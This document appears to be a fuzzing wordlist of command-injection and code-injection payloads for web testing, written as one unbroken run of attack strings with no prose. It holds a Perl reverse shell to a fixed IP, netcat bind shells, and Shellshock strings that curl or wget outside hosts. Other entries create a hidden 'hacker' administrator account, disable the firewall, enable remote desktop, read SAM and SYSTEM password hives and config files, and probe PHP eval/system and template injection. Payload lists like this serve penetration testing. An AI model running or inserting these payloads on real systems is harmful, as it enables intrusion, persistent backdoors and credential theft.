` || | ; ' '" " "' & && %0a %0a%0d %0Aid %0a id %0a %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %0A/usr/bin/id %0A/usr/bin/id%0A %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 %20{${phpinfo()}} %20{${sleep(20)}} %20{${sleep(3)}} a|id| a;id| a;id; a;id\n () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 | curl http://crowdshield.com/.testing/rce.txt & curl http://crowdshield.com/.testing/rce.txt ; curl https://crowdshield.com/.testing/rce_vuln.txt && curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) dir | dir ; dir $(`dir`) & dir &&dir && dir | dir C:\ ; dir C:\ & dir C:\ && dir C:\ dir C:\ | dir C:\Documents and Settings\* ; dir C:\Documents and Settings\* & dir C:\Documents and Settings\* && dir C:\Documents and Settings\* dir C:\Documents and Settings\* | dir C:\Users ; dir C:\Users & dir C:\Users && dir C:\Users dir C:\Users ;echo%20'' echo ''// XXXXXXXXXXX | echo "" > rfi.php ; echo "" > rfi.php & echo "" > rfi.php && echo "" > rfi.php echo "" > rfi.php | echo "" > dir.php ; echo "" > dir.php & echo "" > dir.php && echo "" > dir.php echo "" > dir.php | echo "" > cmd.php ; echo "" > cmd.php & echo "" > cmd.php && echo "" > cmd.php echo "" > cmd.php ;echo '' echo ''// XXXXXXXXXXX echo ''// XXXXXXXXXXX | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl () { :;}; echo vulnerable 10 eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') eval('ls') eval('pwd') eval('pwd'); eval('sleep 5') eval('sleep 5'); eval('whoami') eval('whoami'); exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') exec('ls') exec('pwd') exec('pwd'); exec('sleep 5') exec('sleep 5'); exec('whoami') exec('whoami'); ;{$_GET["cmd"]} `id` |id | id ;id ;id| ;id; & id &&id ;id\n ifconfig | ifconfig ; ifconfig & ifconfig && ifconfig /index.html|id| ipconfig | ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all ls $(`ls`) | ls -l / ; ls -l / & ls -l / && ls -l / ls -l / | ls -laR /etc ; ls -laR /etc & ls -laR /etc && ls -laR /etc | ls -laR /var/www ; ls -laR /var/www & ls -laR /var/www && ls -laR /var/www | ls -l /etc/ ; ls -l /etc/ & ls -l /etc/ && ls -l /etc/ ls -l /etc/ ls -lh /etc/ | ls -l /home/* ; ls -l /home/* & ls -l /home/* && ls -l /home/* ls -l /home/* *; ls -lhtR /var/www/ | ls -l /tmp ; ls -l /tmp & ls -l /tmp && ls -l /tmp ls -l /tmp | ls -l /var/www/* ; ls -l /var/www/* & ls -l /var/www/* && ls -l /var/www/* ls -l /var/www/* \n \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` \n/bin/ls -al\n | nc -lvvp 4444 -e /bin/sh| ; nc -lvvp 4444 -e /bin/sh; & nc -lvvp 4444 -e /bin/sh& && nc -lvvp 4444 -e /bin/sh & nc -lvvp 4444 -e /bin/sh nc -lvvp 4445 -e /bin/sh & nc -lvvp 4446 -e /bin/sh| nc -lvvp 4447 -e /bin/sh; nc -lvvp 4448 -e /bin/sh& \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n \necho INJECTX\nexit\n\033[2Asleep 5\n \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n | net localgroup Administrators hacker /ADD ; net localgroup Administrators hacker /ADD & net localgroup Administrators hacker /ADD && net localgroup Administrators hacker /ADD net localgroup Administrators hacker /ADD | netsh firewall set opmode disable ; netsh firewall set opmode disable & netsh firewall set opmode disable && netsh firewall set opmode disable netsh firewall set opmode disable netstat ;netstat -a; | netstat -an ; netstat -an & netstat -an && netstat -an netstat -an | net user hacker Password1 /ADD ; net user hacker Password1 /ADD & net user hacker Password1 /ADD && net user hacker Password1 /ADD net user hacker Password1 /ADD | net view ; net view & net view && net view net view \nid| \nid; \nid\n \n/usr/bin/id\n perl -e 'print "X"x1024' || perl -e 'print "X"x16096' | perl -e 'print "X"x16096' ; perl -e 'print "X"x16096' & perl -e 'print "X"x16096' && perl -e 'print "X"x16096' perl -e 'print "X"x16384' ; perl -e 'print "X"x2048' & perl -e 'print "X"x2048' && perl -e 'print "X"x2048' perl -e 'print "X"x2048' || perl -e 'print "X"x4096' | perl -e 'print "X"x4096' ; perl -e 'print "X"x4096' & perl -e 'print "X"x4096' && perl -e 'print "X"x4096' perl -e 'print "X"x4096' || perl -e 'print "X"x8096' | perl -e 'print "X"x8096' ; perl -e 'print "X"x8096' && perl -e 'print "X"x8096' perl -e 'print "X"x8192' perl -e 'print "X"x81920' || phpinfo() | phpinfo() {${phpinfo()}} ;phpinfo() ;phpinfo();// ';phpinfo();// {${phpinfo()}} & phpinfo() && phpinfo() phpinfo() phpinfo(); :phpversion(); `ping 127.0.0.1` & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ;${@print(md5(RCEVulnerable))}; ${@print("RCEVulnerable")} ${@print(system($_SERVER['HTTP_USER_AGENT']))} pwd | pwd ; pwd & pwd && pwd \r | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f \r\n route | sleep 1 ; sleep 1 & sleep 1 && sleep 1 sleep 1 || sleep 10 | sleep 10 ; sleep 10 {${sleep(10)}} & sleep 10 && sleep 10 sleep 10 || sleep 15 | sleep 15 ; sleep 15 & sleep 15 && sleep 15 {${sleep(20)}} {${sleep(20)}} {${sleep(3)}} {${sleep(3)}} | sleep 5 ; sleep 5 & sleep 5 && sleep 5 sleep 5 {${sleep(hexdec(dechex(20)))}} {${sleep(hexdec(dechex(20)))}} sysinfo | sysinfo ; sysinfo & sysinfo && sysinfo system('cat C:\boot.ini'); system('cat config.php'); || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); system('curl https://crowdshield.com/.testing/rce_vuln.txt') system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') systeminfo | systeminfo ; systeminfo & systeminfo && systeminfo system('ls') system('pwd') system('pwd'); || system('sleep 5'); | system('sleep 5'); ; system('sleep 5'); & system('sleep 5'); && system('sleep 5'); system('sleep 5') system('sleep 5'); system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); system('whoami') system('whoami'); test*; ls -lhtR /var/www/ test* || perl -e 'print "X"x16096' test* | perl -e 'print "X"x16096' test* & perl -e 'print "X"x16096' test* && perl -e 'print "X"x16096' test*; perl -e 'print "X"x16096' $(`type C:\boot.ini`) &&type C:\\boot.ini | type C:\Windows\repair\SAM ; type C:\Windows\repair\SAM & type C:\Windows\repair\SAM && type C:\Windows\repair\SAM type C:\Windows\repair\SAM | type C:\Windows\repair\SYSTEM ; type C:\Windows\repair\SYSTEM & type C:\Windows\repair\SYSTEM && type C:\Windows\repair\SYSTEM type C:\Windows\repair\SYSTEM | type C:\WINNT\repair\SAM ; type C:\WINNT\repair\SAM & type C:\WINNT\repair\SAM && type C:\WINNT\repair\SAM type C:\WINNT\repair\SAM type C:\WINNT\repair\SYSTEM | type %SYSTEMROOT%\repair\SAM ; type %SYSTEMROOT%\repair\SAM & type %SYSTEMROOT%\repair\SAM && type %SYSTEMROOT%\repair\SAM type %SYSTEMROOT%\repair\SAM | type %SYSTEMROOT%\repair\SYSTEM ; type %SYSTEMROOT%\repair\SYSTEM & type %SYSTEMROOT%\repair\SYSTEM && type %SYSTEMROOT%\repair\SYSTEM type %SYSTEMROOT%\repair\SYSTEM uname ;uname; | uname -a ; uname -a & uname -a && uname -a uname -a |/usr/bin/id ;|/usr/bin/id| ;/usr/bin/id| $;/usr/bin/id () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 | wget http://crowdshield.com/.testing/rce.txt & wget http://crowdshield.com/.testing/rce.txt ; wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) && wget https://crowdshield.com/.testing/rce_vuln.txt wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) which curl which gcc which nc which netcat which perl which python which wget whoami | whoami ; whoami ' whoami ' || whoami ' & whoami ' && whoami '; whoami " whoami " || whoami " | whoami " & whoami " && whoami "; whoami $(`whoami`) & whoami && whoami {{ get_user_file("C:\boot.ini") }} {{ get_user_file("/etc/hosts") }} {{4+4}} {{4+8}} {{person.secret}} {{person.name}} {1} + {1} {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} {{[] .__ Class __.__ base __.__ subclasses __ ()}}